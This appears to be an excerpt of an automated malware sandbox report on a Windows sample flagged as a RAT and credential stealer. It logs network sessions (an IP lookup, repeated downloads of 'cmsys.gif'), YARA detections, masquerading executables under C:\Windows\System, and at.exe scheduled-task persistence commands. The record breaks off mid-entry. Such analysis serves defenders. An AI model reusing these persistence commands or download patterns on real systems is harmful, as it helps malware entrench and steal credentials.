                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  5 | 192.168.2.4 | 49805 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  6 | 192.168.2.4 | 49810 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  7 | 192.168.2.4 | 49753 | 104.18.114.97 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:09:15.496514082 CEST | 924 | OUT | GET / HTTP/1.1
                                                                                  Host: icanhazip.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:15.521750927 CEST | 924 | IN | HTTP/1.1 200 OK
                                                                                  Date: Fri, 05 Aug 2022 07:09:15 GMT
                                                                                  Content-Type: text/plain
                                                                                  Content-Length: 14
                                                                                  Connection: keep-alive
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Methods: GET
                                                                                  Set-Cookie: __cf_bm=arDwI3mggsXldWCcpH0AVRR.9iIZ82B.5F5bdtJi3eY-1659683355-0-AVB0owPg7Q/jud4+qBksqRXyPGsYBAVdtbK0ieU8WT0cB002n9hCHuXLiUxtbnbjs5gx931uaIu4vOSzuEr75Aw=; path=/; expires=Fri, 05-Aug-22 07:39:15 GMT; domain=.icanhazip.com; HttpOnly
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 735db4cbeb5b9968-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                  Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 0a
                                                                                  Data Ascii: 102.129.143.3


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  8 | 192.168.2.4 | 49760 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:09:28.219057083 CEST | 1146 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:28.246371984 CEST | 1148 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:28 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:09:28.246386051 CEST | 1148 | IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  9 | 192.168.2.4 | 49761 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:09:30.905103922 CEST | 1149 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:30.932235003 CEST | 1151 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:30 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:09:30.932254076 CEST | 1151 | IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  0 | 192.168.2.4 | 49766 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 07:09:40 UTC | 0 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Connection: Keep-Alive
                                                                                  Host: zxq.net
                                                                                  2022-08-05 07:09:40 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                  x-redirect-by: WordPress
                                                                                  location: https://zxq.net/what-happened-to-the-old-zxq-website/
                                                                                  x-litespeed-cache: hit
                                                                                  content-length: 0
                                                                                  date: Fri, 05 Aug 2022 07:09:40 GMT
                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  1 | 192.168.2.4 | 49769 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 07:09:41 UTC | 0 | OUT | GET /what-happened-to-the-old-zxq-website/ HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Connection: Keep-Alive
                                                                                  Host: zxq.net
                                                                                  2022-08-05 07:09:41 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                  Connection: close
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                  link: <https://zxq.net/wp-json/wp/v2/pages/187>; rel="alternate"; type="application/json"
                                                                                  link: <https://zxq.net/?p=187>; rel=shortlink
                                                                                  etag: "5981-1659425030;;;"
                                                                                  x-litespeed-cache: hit
                                                                                  transfer-encoding: chunked
                                                                                  date: Fri, 05 Aug 2022 07:09:41 GMT
                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                  2022-08-05 07:09:41 UTC | 1 | IN
                                                                                  Data Ascii: dbde<!DOCTYPE html><html lang="en-US" class="s-dark site-s-dark"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='index, follow, max-image-preview:large, max-snipp
                                                                                  2022-08-05 07:09:41 UTC | 2 | IN
                                                                                  Data Ascii: g:type" content="article" /><meta property="og:title" content="What happened to the old ZXQ website?" /><meta property="og:description" content="Information For ZXQ.net Subdomain Owners The old ZXQ website had been shut down by the previous owners. Pr
                                                                                  2022-08-05 07:09:41 UTC | 16 | IN
                                                                                  Data Ascii: ransform: uppercase; letter-spacing: .05em; }.navigation-main .menu > li li a { font-size: 14px; }.navigation-main { --nav-items-space: 33px; }.s-light .navigation-main { --c-nav: #000000; }.s-light .navigation { --c-nav-blip: var(--c-main); }.s-dark
                                                                                  2022-08-05 07:09:41 UTC | 32 | IN
                                                                                  Data Ascii: el="home" class="logo-link ts-logo logo-is-image"><span><img src="https://zxq.net/wp-content/uploads/2022/02/ZXQ.png" class="logo-image" alt="ZXQ" width="203" height="66"/> </span></a></div><div class=
                                                                                  2022-08-05 07:09:41 UTC | 48 | IN
                                                                                  Data Ascii: line-Shopping-Tips-During-Covid-01-300x169.jpeg 300w, https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01-1024x576.jpeg 1024w, https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01-768x432.jpeg 768w, h
                                                                                  2022-08-05 07:09:41 UTC | 56 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  2 | 192.168.2.4 | 49782 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 07:09:59 UTC | 56 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Connection: Keep-Alive
                                                                                  Host: zxq.net
                                                                                  2022-08-05 07:09:59 UTC56INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                  x-redirect-by: WordPress
                                                                                  location: https://zxq.net/what-happened-to-the-old-zxq-website/
                                                                                  x-litespeed-cache: hit
                                                                                  content-length: 0
                                                                                  date: Fri, 05 Aug 2022 07:09:59 GMT
                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  3 | 192.168.2.4 | 49789 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 07:10:18 UTC | 57 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Connection: Keep-Alive
                                                                                  Host: zxq.net
                                                                                  2022-08-05 07:10:18 UTC | 57 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                  x-redirect-by: WordPress
                                                                                  location: https://zxq.net/what-happened-to-the-old-zxq-website/
                                                                                  x-litespeed-cache: hit
                                                                                  content-length: 0
                                                                                  date: Fri, 05 Aug 2022 07:10:18 GMT
                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  4 | 192.168.2.4 | 49798 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 07:10:34 UTC | 58 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Connection: Keep-Alive
                                                                                  Host: zxq.net
                                                                                  2022-08-05 07:10:34 UTC | 58 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                  x-redirect-by: WordPress
                                                                                  location: https://zxq.net/what-happened-to-the-old-zxq-website/
                                                                                  x-litespeed-cache: hit
                                                                                  content-length: 0
                                                                                  date: Fri, 05 Aug 2022 07:10:34 GMT
                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  5 | 192.168.2.4 | 49805 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 07:10:49 UTC | 58 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Connection: Keep-Alive
                                                                                  Host: zxq.net
                                                                                  2022-08-05 07:10:50 UTC | 59 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                  x-redirect-by: WordPress
                                                                                  location: https://zxq.net/what-happened-to-the-old-zxq-website/
                                                                                  x-litespeed-cache: hit
                                                                                  content-length: 0
                                                                                  date: Fri, 05 Aug 2022 07:10:50 GMT
                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  6 | 192.168.2.4 | 49810 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 07:11:05 UTC | 59 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Connection: Keep-Alive
                                                                                  Host: zxq.net
                                                                                  2022-08-05 07:11:05 UTC | 59 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                  x-redirect-by: WordPress
                                                                                  location: https://zxq.net/what-happened-to-the-old-zxq-website/
                                                                                  x-litespeed-cache: hit
                                                                                  content-length: 0
                                                                                  date: Fri, 05 Aug 2022 07:11:05 GMT
                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                  Target ID:0
                                                                                  Start time:09:09:07
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\Desktop\Lg3gn9y1Cj.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Lg3gn9y1Cj.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:416083 bytes
                                                                                  MD5 hash:45061E4DA841C2587D0890148705A142
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic
                                                                                  Reputation:low

                                                                                  Target ID:1
                                                                                  Start time:09:09:09
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\Desktop\lg3gn9y1cj.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:c:\users\user\desktop\lg3gn9y1cj.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:135168 bytes
                                                                                  MD5 hash:BEE47439C4960E2728594ECE9AD95BA7
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic
                                                                                  Yara matches:
                                                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\Desktop\lg3gn9y1cj.exe, Author: ditekSHen
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 26%, Metadefender
                                                                                  • Detection: 92%, ReversingLabs
                                                                                  Reputation:low

                                                                                  Target ID:2
                                                                                  Start time:09:09:11
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                  Imagebase:0x980000
                                                                                  File size:98912 bytes
                                                                                  MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.277724010.000000000733B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.277673083.00000000072F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high

                                                                                  Target ID:4
                                                                                  Start time:09:09:12
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\AppData\Local\icsys.icn.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\icsys.icn.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:280890 bytes
                                                                                  MD5 hash:4223968DA579570E05813854A134397B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low

                                                                                  Target ID:5
                                                                                  Start time:09:09:14
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System\explorer.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:c:\windows\system\explorer.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:281083 bytes
                                                                                  MD5 hash:A6F18E47BFFD6F5C4AA28B67644DBDBE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low

                                                                                  Target ID:7
                                                                                  Start time:09:09:15
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System\spoolsv.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:c:\windows\system\spoolsv.exe SE
                                                                                  Imagebase:0x400000
                                                                                  File size:281050 bytes
                                                                                  MD5 hash:3BA9E53239D4DCA948B4BFCBB08D7F34
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low

                                                                                  Target ID:8
                                                                                  Start time:09:09:16
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:c:\windows\system\svchost.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:281069 bytes
                                                                                  MD5 hash:B61A3DA9B4DB4644497B9CC1BE87515F
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low

                                                                                  Target ID:9
                                                                                  Start time:09:09:17
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System\spoolsv.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:c:\windows\system\spoolsv.exe PR
                                                                                  Imagebase:0x400000
                                                                                  File size:281050 bytes
                                                                                  MD5 hash:3BA9E53239D4DCA948B4BFCBB08D7F34
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic
                                                                                  Reputation:low

                                                                                  Target ID:10
                                                                                  Start time:09:09:18
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Target ID:11
                                                                                  Start time:09:09:19
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:12
                                                                                  Start time:09:09:20
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Target ID:13
                                                                                  Start time:09:09:21
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:14
                                                                                  Start time:09:09:21
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:15
                                                                                  Start time:09:09:26
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Target ID:16
                                                                                  Start time:09:09:26
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
